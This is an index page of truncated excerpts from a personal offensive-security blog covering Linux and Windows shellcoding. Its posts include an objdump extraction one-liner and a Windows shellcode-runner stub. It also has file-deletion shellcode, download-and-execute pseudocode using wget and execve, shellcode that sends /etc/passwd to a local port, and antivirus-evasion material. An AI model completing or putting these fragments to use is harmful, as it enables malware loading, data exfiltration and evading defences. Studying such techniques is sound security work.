-
Shifting from 32bit to 64bit Linux Shellcode
Here is a short write-up about my first steps in Linux (Kali in my case) 64-bit shellcoding. Mostly as a reminder for myself, but maybe it helps some folks save a little time. Hello World: First I searched for two hello world shellcode examples to compare them. I adjusted the examples: Get…
-
Dumping shellcode 64bit style
Problem: I had a shellcode that I compiled and used in a .c program. The compiled .c program crashed, but the executable from the assembly file worked. Normally I use this line:
# objdump -d hello32|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d…
-
Null Free Windows WinExec Shellcode & Tool for generating Payload
Shellcode: Here is a shellcode that should run on most Windows machines. I adapted code from here: http://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html so thanks to the author of that shellcode. Instead of CreateProcess I use WinExec in this example.
; Filename: winexec.asm
; Author: Daniel Sauder
; Website: https://govolution.wordpress.com/
; License: http://creativecommons.org/licenses/by-sa/3.0/
BITS 32
global _start
_start:
xor ebx,…
-
Deepsec 2014: Why Antivirus Software fails
Here are the slides from my talk at the Deepsec 2014 conference: https://deepsec.net/docs/Slides/2014/Why_Antivirus_Fails_-_Daniel_Sauder.pdf
-
Shellcode Binder for Windows 64-Bit
I did not find a shellcode binder for Windows 64-bit systems, so here is my version:
#include <windows.h>
unsigned char sc[] = // your shellcode here
typedef void (*FUNCPTR)();
int main(int argc, char **argv) {
FUNCPTR func;
int len;
DWORD oldProtect;
len = sizeof(sc);
if (0 == VirtualProtect(&sc, len, PAGE_EXECUTE_READWRITE, &oldProtect)) return 1;
func…
-
Useful Add-ons for Web Application Pentesting
So here is just a very short one. Whenever I have to set up a new pentest machine I have to look this up again, so here is a small list of browser add-ons that are useful for web app pentesting: Wappalyzer, Hackbar, Firebug, FoxyProxy, Export Cookies, ProfileSwitcher, Web Developer Toolbar, GroundSpeed, Tamper Data, ImmuniWeb
-
Article about Antivirus Evasion
Check out my article about antivirus evasion here.
-
Shellcode for deleting a file
Just a short one here. This shellcode simply deletes a file with the name x. Have fun.
deletefile.nasm
; Filename: deletefile.nasm
; Author: Daniel Sauder
; Website: https://govolution.wordpress.com
; Tested on: Ubuntu 12.04 / 32Bit
; License http://creativecommons.org/licenses/by-sa/3.0/
; delete file with name x
section .text
global _start
_start:
push 0x78 ; push x, filename…
-
Writing a download and exec shellcode
After completing the tasks for the SLAE certification, I went on to write a shellcode for downloading and executing a file. For this task I want to use wget with execve. But first, some pseudocode:
start
execve wget file_x
chmod +x file_x
execve file_x
end
So that is the plan. See a problem here? Look at the…
-
SLAE: Shellcode read and send file
Because it is so much fun, I developed a shellcode that reads /etc/passwd and then sends the content to 127.1.1.1 port 12345. And here it is:
shellcode.c
/*
; Author: Daniel Sauder
; Website: https://govolution.wordpress.com/about
; License http://creativecommons.org/licenses/by-sa/3.0/
; Shellcode reads /etc/passwd and sends the content to 127.1.1.1 port 12345.
; The file can be…